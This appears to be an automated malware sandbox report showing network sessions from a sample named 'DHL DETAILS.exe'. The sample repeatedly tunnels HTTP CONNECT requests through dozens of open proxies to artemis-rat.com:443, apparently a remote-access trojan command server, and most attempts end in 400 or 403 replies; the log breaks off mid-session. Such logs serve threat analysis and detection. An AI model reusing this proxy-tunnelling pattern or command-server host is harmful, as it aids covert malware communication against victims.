                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1242192.168.2.55373574.48.7.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.912678003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1243192.168.2.553742173.245.49.27806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.912758112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.067095041 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1244192.168.2.553752104.20.123.164806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.927459002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.082169056 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1245192.168.2.55375131.43.179.214806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.927460909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.082233906 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1246192.168.2.553753172.67.3.98806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.938993931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.093103886 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1247192.168.2.553649123.30.154.17177776352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.948652029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.313829899 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.10.3 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1248192.168.2.553648113.140.74.2680006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.965786934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.303200960 CET922INHTTP/1.1 400
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Language: zh-CN
                                                                                    Content-Length: 764
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 e7 8a b6 e6 80 81 20 34 30 30 20 2d 20 e9 94 99 e8 af af e7 9a 84 e8 af b7 e6 b1 82 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 e7 8a b6 e6 80 81 20 34 30 30 20 2d 20 e9 94 99 e8 af af e7 9a 84 e8 af b7 e6 b1 82 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e e7 b1 bb e5 9e 8b 3c 2f 62 3e 20 e7 8a b6 e6 80 81 e6 8a a5 e5 91 8a 3c 2f 70 3e 3c 70 3e 3c 62 3e e6 b6 88 e6 81 af 3c 2f 62 3e 20 49 6e 76 61 6c 69 64 20 55 52 49 3c 2f 70 3e 3c 70 3e 3c 62 3e e6 8f 8f e8 bf b0 3c 2f 62 3e 20 e7 94 b1 e4 ba 8e e8 a2 ab e8 ae a4 e4 b8 ba e6 98 af e5 ae a2 e6 88 b7 e7 ab af e5 af b9 e9 94 99 e8 af af ef bc 88 e4 be 8b e5 a6 82 ef bc 9a e7 95 b8 e5 bd a2 e7 9a 84 e8 af b7 e6 b1 82 e8 af ad e6 b3 95 e3 80 81 e6 97 a0 e6 95 88 e7 9a 84 e8 af b7 e6 b1 82 e4 bf a1 e6 81 af e5 b8 a7 e6 88 96 e8 80 85 e8 99 9a e6 8b 9f e7 9a 84 e8 af b7 e6 b1 82 e8 b7 af e7 94 b1 ef bc 89 ef bc 8c e6 9c 8d e5 8a a1 e5 99 a8 e6 97 a0 e6 b3 95 e6 88 96 e4 b8 8d e4 bc 9a e5 a4 84 e7 90 86 e5 bd 93 e5 89 8d e8 af b7 e6 b1 82 e3 80 82 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 37 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!doctype html><html lang="zh"><head><title>HTTP 400 - </title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP 400 - </h1><hr class="line" /><p><b></b> </p><p><b></b> Invalid URI</p><p><b></b> </p><hr class="line" /><h3>Apache Tomcat/8.5.75</h3></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1249192.168.2.55371651.222.241.157272066352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.967132092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.536459923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.224344969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.724183083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1250192.168.2.55365814.103.24.2080006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.995776892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1251192.168.2.55373264.56.150.10231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.999273062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.248466969 CET1254INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/3.5.28
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 952
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from ah_test
                                                                                    Via: 1.1 ah_test (squid/3.5.28)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53 61 74 2c 20 30 39 20 4d 61 72 20 32 30 32 34 20 31 32 3a 31 34 3a 31 37 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Sat, 09 Mar 2024 12:14:17 GMT</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1252192.168.2.553660218.252.244.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.000579119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1253192.168.2.55366220.111.54.16806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.084031105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.382025003 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1254192.168.2.553692140.238.25.255210006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.084031105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1255192.168.2.55196316.162.211.9010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.086553097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.177052021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1256192.168.2.553661194.247.173.1780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.087400913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1257192.168.2.553697193.84.89.20284436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.087523937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1258192.168.2.553672122.51.123.219806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.088562965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1259192.168.2.55366327.65.240.15710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.089492083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
